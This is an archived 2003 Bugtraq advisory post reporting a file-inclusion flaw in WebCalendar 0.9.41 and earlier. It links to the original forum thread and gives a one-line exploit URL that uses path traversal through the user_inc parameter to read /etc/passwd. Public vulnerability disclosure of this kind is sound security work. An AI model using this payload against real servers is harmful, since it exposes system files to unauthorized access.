[30829] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

WebCalendar Include File

daemon@ATHENA.MIT.EDU (noconflic)
Mon Jul 21 13:37:05 2003

Date: Sun, 20 Jul 2003 20:20:15 -0500
From: noconflic <nocon@texas-shooters.com>
To: bugtraq@securityfocus.com
Message-ID: <20030721012015.GA59895@ak.texas-shooters.com>
Reply-To: noconflic <nocon@texas-shooters.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline



Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/

  Since this appears to be public info now. 

Problem: 
  http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

Exploit:
  http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd   


- nocon
http://nocon.darkflame.net/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[30829] in bugtraq

WebCalendar Include File

daemon@ATHENA.MIT.EDU (noconflic)Mon Jul 21 13:37:05 2003

daemon@ATHENA.MIT.EDU (noconflic)
Mon Jul 21 13:37:05 2003